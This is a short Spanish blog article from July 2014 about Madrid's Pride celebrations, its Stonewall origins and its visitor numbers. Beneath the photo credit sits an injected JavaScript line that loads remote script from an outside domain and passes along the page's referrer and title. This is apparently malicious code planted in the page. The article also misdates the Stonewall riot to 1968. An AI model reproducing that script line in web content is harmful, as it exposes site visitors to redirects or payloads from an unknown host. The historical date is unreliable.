La Fiesta del Orgullo

02/07/2014

Bandera gay junto ayuntamiento de Madrid

Nueva York. 28 de junio de 1968. Un grupo de clientes y vecinos del bar Stoewall Inn se reúnen frente al local neoyorquino en señal de protesta por la redada policial que se acababa de acometer en el bar del Greenwich Village contra los homosexuales.

Este hecho marcó un antes y un después en la historia de la lucha por los derechos homosexuales. La historia no sería la misma si ese 28 de junio ese grupo de espontáneos no se hubiera manifestado. Desde entonces se estableció tal día como perfecto para homenajear al homosexual y a sus derechos. Y así en muchas partes del mundo cada 28 de junio se celebra el ya famoso Día del Orgullo Gay.

Madrid es una de esas ciudades míticas en esta celebración. Para muestra un botón: en 2009 consiguió reunir la friolera de un millón y medio de personas. Rotundo éxito. Tanto así que fue la más grande de Europa. En 2013, 250.000 extranjeros visitaron la capital española durante las Fiestas del Orgullo. En breve sabremos lo que sucede en 2014. A tener en cuenta que este año se mueve el homenaje gay en Madrid a los días 2, 3, 4, 5 y 6 de julio. La cosa promete. Chueca, el barrio gay de la capital, se vestirá de gala nuevamente, y tirará la casa por la ventana. Todo un canto a la libertad que tocará el cielo dentro de unos años: en 2017 albergará el Festival Mundial del Orgullo Gay. Ahí es nada.

Foto | Turismo Madrid

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO